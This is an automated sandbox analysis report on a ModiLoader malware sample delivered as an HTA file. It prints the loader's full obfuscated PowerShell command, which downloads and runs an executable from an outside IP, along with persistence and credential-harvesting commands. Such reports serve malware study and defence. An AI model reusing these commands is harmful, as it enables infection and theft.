modiloader | 5774db473258bf744264a3a02e01931fa02ecd19a26f0f9329bfa5ac89d08512

Analysis

max time kernel
148s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
01/04/2025, 15:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

creatingbestthingsforbetterfuture.hta
Size

13KB
MD5

d784a93b62ff236f0090d49eee225f61
SHA1

18545dbd755b169d693a42c7e0ab32f4fd81aeaf
SHA256

5774db473258bf744264a3a02e01931fa02ecd19a26f0f9329bfa5ac89d08512
SHA512

3ca6164390caddbfe14bb3b50e690c08bd5e4df827b4a24e642b759c63cb375cf54ed9f3c9e9bd76c13075f149637034cee64039c9230bc100ba3016c42e73f0
SSDEEP

48:3StrVotriVRy1K+rUmn514Szy6oFAConovTboMrt2tgVJtSPG:AgrYmN514SyJF1onovTbDEGS+

Score

10^/10

modiloader collection defense_evasion discovery execution trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 61 IoCs

resource	yara_rule
behavioral1/memory/1316-79-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-83-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-95-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-116-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-141-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-140-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-139-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-138-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-136-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-135-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-134-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-132-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-131-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-130-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-129-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-125-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-124-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-123-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-121-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-120-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-118-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-115-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-113-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-114-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-111-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-110-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-109-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-108-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-106-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-105-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-104-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-100-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-133-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-99-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-128-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-127-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-126-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-122-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-97-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-96-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-119-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-117-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-94-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-93-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-112-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-107-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-103-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-102-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-101-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-98-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-85-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-84-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-92-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-81-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-91-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-90-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-82-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-89-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-88-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-87-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2
behavioral1/memory/1316-86-0x0000000002A10000-0x0000000003A10000-memory.dmp	modiloader_stage2

Blocklisted process makes network request 1 IoCs

flow	pid	Process
23	4976	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
23	4976	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2268	cmd.exe
4976	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 4 IoCs

pid	Process
1316	sihost.exe
4424	alpha.pif
1112	alpha.pif
4992	Djauszke.PIF

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	recover.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1316 set thread context of 3736	1316	sihost.exe	119
PID 1316 set thread context of 3680	1316	sihost.exe	121
PID 1316 set thread context of 1452	1316	sihost.exe	124

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1452	4992	WerFault.exe	126

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	recover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	recover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sihost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alpha.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alpha.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	recover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Djauszke.PIF
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
336	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
336	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3328	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4976	powershell.exe
4976	powershell.exe
3736	recover.exe
3736	recover.exe
1452	recover.exe
1452	recover.exe
3736	recover.exe
3736	recover.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
1316	sihost.exe
1316	sihost.exe
1316	sihost.exe
1316	sihost.exe
1316	sihost.exe
1316	sihost.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeDebugPrivilege	1452	recover.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1316	sihost.exe

Suspicious use of WriteProcessMemory 63 IoCs

description	pid	Process	procid_target
PID 3500 wrote to memory of 2268	3500	mshta.exe	87
PID 3500 wrote to memory of 2268	3500	mshta.exe	87
PID 3500 wrote to memory of 2268	3500	mshta.exe	87
PID 2268 wrote to memory of 4976	2268	cmd.exe	90
PID 2268 wrote to memory of 4976	2268	cmd.exe	90
PID 2268 wrote to memory of 4976	2268	cmd.exe	90
PID 4976 wrote to memory of 3328	4976	powershell.exe	94
PID 4976 wrote to memory of 3328	4976	powershell.exe	94
PID 4976 wrote to memory of 3328	4976	powershell.exe	94
PID 3328 wrote to memory of 5000	3328	csc.exe	95
PID 3328 wrote to memory of 5000	3328	csc.exe	95
PID 3328 wrote to memory of 5000	3328	csc.exe	95
PID 4976 wrote to memory of 1316	4976	powershell.exe	101
PID 4976 wrote to memory of 1316	4976	powershell.exe	101
PID 4976 wrote to memory of 1316	4976	powershell.exe	101
PID 1316 wrote to memory of 5012	1316	sihost.exe	104
PID 1316 wrote to memory of 5012	1316	sihost.exe	104
PID 1316 wrote to memory of 5012	1316	sihost.exe	104
PID 1316 wrote to memory of 3372	1316	sihost.exe	105
PID 1316 wrote to memory of 3372	1316	sihost.exe	105
PID 1316 wrote to memory of 3372	1316	sihost.exe	105
PID 3372 wrote to memory of 336	3372	cmd.exe	108
PID 3372 wrote to memory of 336	3372	cmd.exe	108
PID 3372 wrote to memory of 336	3372	cmd.exe	108
PID 5012 wrote to memory of 4556	5012	cmd.exe	109
PID 5012 wrote to memory of 4556	5012	cmd.exe	109
PID 5012 wrote to memory of 4556	5012	cmd.exe	109
PID 5012 wrote to memory of 4424	5012	cmd.exe	110
PID 5012 wrote to memory of 4424	5012	cmd.exe	110
PID 5012 wrote to memory of 4424	5012	cmd.exe	110
PID 5012 wrote to memory of 1112	5012	cmd.exe	111
PID 5012 wrote to memory of 1112	5012	cmd.exe	111
PID 5012 wrote to memory of 1112	5012	cmd.exe	111
PID 1316 wrote to memory of 4460	1316	sihost.exe	112
PID 1316 wrote to memory of 4460	1316	sihost.exe	112
PID 1316 wrote to memory of 4460	1316	sihost.exe	112
PID 4460 wrote to memory of 3328	4460	cmd.exe	115
PID 4460 wrote to memory of 3328	4460	cmd.exe	115
PID 4460 wrote to memory of 3328	4460	cmd.exe	115
PID 1316 wrote to memory of 3736	1316	sihost.exe	119
PID 1316 wrote to memory of 3736	1316	sihost.exe	119
PID 1316 wrote to memory of 3736	1316	sihost.exe	119
PID 1316 wrote to memory of 3736	1316	sihost.exe	119
PID 1316 wrote to memory of 4496	1316	sihost.exe	120
PID 1316 wrote to memory of 4496	1316	sihost.exe	120
PID 1316 wrote to memory of 4496	1316	sihost.exe	120
PID 1316 wrote to memory of 3680	1316	sihost.exe	121
PID 1316 wrote to memory of 3680	1316	sihost.exe	121
PID 1316 wrote to memory of 3680	1316	sihost.exe	121
PID 1316 wrote to memory of 3680	1316	sihost.exe	121
PID 1316 wrote to memory of 4996	1316	sihost.exe	122
PID 1316 wrote to memory of 4996	1316	sihost.exe	122
PID 1316 wrote to memory of 4996	1316	sihost.exe	122
PID 1316 wrote to memory of 4016	1316	sihost.exe	123
PID 1316 wrote to memory of 4016	1316	sihost.exe	123
PID 1316 wrote to memory of 4016	1316	sihost.exe	123
PID 1316 wrote to memory of 1452	1316	sihost.exe	124
PID 1316 wrote to memory of 1452	1316	sihost.exe	124
PID 1316 wrote to memory of 1452	1316	sihost.exe	124
PID 1316 wrote to memory of 1452	1316	sihost.exe	124
PID 4444 wrote to memory of 4992	4444	rundll32.exe	126
PID 4444 wrote to memory of 4992	4444	rundll32.exe	126
PID 4444 wrote to memory of 4992	4444	rundll32.exe	126

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingbestthingsforbetterfuture.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3500
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C poWershell.exe -eX ByPASs -NONi -w 1 -C DeVIcecredentialDePLOYMeNt ; Iex($(iEX('[sYSTem.teXt.ENcoDinG]'+[CHAr]0x3a+[chAR]0x3a+'uTF8.gETStRInG([systeM.cOnvert]'+[CHAR]58+[ChAR]0X3a+'frOMBaSE64STRiNg('+[CHAr]0X22+'JHNSTjd5MEwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQkVSZGVGaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqa2JvZFpGVm1CLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6ZE5FTlRESCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjR2EsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEF4a3RXTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiR0VNaXhyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZVNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNUbmV5WlllQ1RpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHNSTjd5MEw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE5MS44OC85MC9zaWhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U1RBclQtU0xFZXAoMyk7aW5WT2tFLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzaWhvc3QuZXhlIg=='+[ChAR]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2268
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poWershell.exe -eX ByPASs -NONi -w 1 -C DeVIcecredentialDePLOYMeNt ; Iex($(iEX('[sYSTem.teXt.ENcoDinG]'+[CHAr]0x3a+[chAR]0x3a+'uTF8.gETStRInG([systeM.cOnvert]'+[CHAR]58+[ChAR]0X3a+'frOMBaSE64STRiNg('+[CHAr]0X22+'JHNSTjd5MEwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQkVSZGVGaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqa2JvZFpGVm1CLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6ZE5FTlRESCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjR2EsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEF4a3RXTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiR0VNaXhyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZVNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNUbmV5WlllQ1RpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHNSTjd5MEw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE5MS44OC85MC9zaWhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U1RBclQtU0xFZXAoMyk7aW5WT2tFLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzaWhvc3QuZXhlIg=='+[ChAR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Downloads MZ/PE file
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4976
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wbhh3b5e\wbhh3b5e.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3328
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES800D.tmp" "c:\Users\Admin\AppData\Local\Temp\wbhh3b5e\CSCBA36A8D0D10F4FCC8D9E605548B18BF.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5000
  - - C:\Users\Admin\AppData\Roaming\sihost.exe
      "C:\Users\Admin\AppData\Roaming\sihost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1316
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\\ProgramData\\9395.cmd
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5012
      - C:\Windows\SysWOW64\esentutl.exe
        
        C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
        6⤵
        
        PID:4556
      - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4424
      - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1112
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\\ProgramData\\6632.cmd
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3372
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 10
        6⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:336
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\\ProgramData\\428.cmd
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4460
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "Djauszke" /tr C:\\ProgramData\\Djauszke.url"
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3328
    - - C:\Windows\SysWOW64\recover.exe
        
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\xnbmalzpudr"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3736
    - - C:\Windows\SysWOW64\recover.exe
        
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\ihgfbekqiljpqh"
        5⤵
        
        PID:4496
    - - C:\Windows\SysWOW64\recover.exe
        
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\ihgfbekqiljpqh"
        5⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:3680
    - - C:\Windows\SysWOW64\recover.exe
        
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\kjlqcwvkwtbcsnazt"
        5⤵
        
        PID:4996
    - - C:\Windows\SysWOW64\recover.exe
        
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\kjlqcwvkwtbcsnazt"
        5⤵
        
        PID:4016
    - - C:\Windows\SysWOW64\recover.exe
        
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\kjlqcwvkwtbcsnazt"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1452

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Windows\System32\ieframe.dll",OpenURL C:\\ProgramData\\Djauszke.url
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4444
- C:\Users\Admin\Links\Djauszke.PIF
  "C:\Users\Admin\Links\Djauszke.PIF"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4992
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 1280
    3⤵
    - Program crash
    PID:1452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4992 -ip 4992
1⤵
PID:776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\428.cmd

Filesize
83B

MD5
40dcdc4a568ca38fd76ed517d58895dd

SHA1
a61427cc65116b4f452c75d8270d5316aa52087f

SHA256
5337e647cbe97c1108b0c690bccf5327291051fd0b80a7c51a8f06ca4c32b987

SHA512
2e32e0bec4ec95af7f1d5fa7a26e69d00a0d50afedeefeb50a809eb52a44d9c00036ccaaf47773035e21925fcc0425a3726d5676013189d0845a31c93dfa0cb1

Download Submit
C:\ProgramData\6632.cmd

Filesize
2KB

MD5
9a020804eba1ffac2928d7c795144bbf

SHA1
61fdc4135afdc99e106912aeafeac9c8a967becc

SHA256
a86c6c7a2bf9e12c45275a5e7ebebd5e6d2ba302fe0a12600b7c9fdf283d9e63

SHA512
42f6d754f1bdbeb6e4cc7aeb57ff4c4d126944f950d260a0839911e576ad16002c16122f81c1d39fa529432dca0a48c9acfbb18804ca9044425c8e424a5518be

Download Submit
C:\ProgramData\9395.cmd

Filesize
19KB

MD5
1df650cca01129127d30063634ab5c03

SHA1
bc7172dec0b12b05f2247bd5e17751eb33474d4e

SHA256
edd4094e7a82a6ff8be65d6b075e9513bd15a6b74f8032b5c10ce18f7191fa60

SHA512
0bddf9ecaaedb0c30103a1fbfb644d6d4f7608bd596403307ed89b2390568c3a29e2cf55d10e2eadbfc407ede52eaf9a4f2321ba5f37e358a1039f73c7688fbd

Download Submit
C:\ProgramData\Djauszke.url

Filesize
99B

MD5
f10077bd71f140d8766825a8c8addf4d

SHA1
28ec95d05d31411784f2e10de562dfc2e6edc109

SHA256
3e900de8ecd6f94db63af992f2d2570dff730ef3bfdff27fb366ea2abc5ce768

SHA512
c43a08378e119c263eb465f51bca6453e0fb559e19b3a8dc95a19ced11c74d42c77152cdc2f5b2954169bea74b60df30ac2a73631b4c3dd8699634bca916c8ff

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
102B

MD5
93b44130f9564d5549036ac90b459816

SHA1
6aaa0cebe8cdcfeb6ad13544b8d84b3dbf3789ff

SHA256
8287081d26f8592906612ac63d16ae94f4d7e23418ca551810c87e80b0bb71a1

SHA512
b07f7453c8e5fddb13b322928219ac3525d9646dc0b770a3e05d3fd65f7b6c39afc04c7cce9b4a51f423bad260e524d731eee98b880cfa4273f43ac3e4c2846e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES800D.tmp

Filesize
1KB

MD5
3ae4f673c7bb7997f7c6dee1228d3ed3

SHA1
4671d1069312618f274c772c44bdaa35bdf1f97b

SHA256
3b6cd2156fcfe133aad200a6dd3c8925fbb296d554a9a94934c554f68386d52f

SHA512
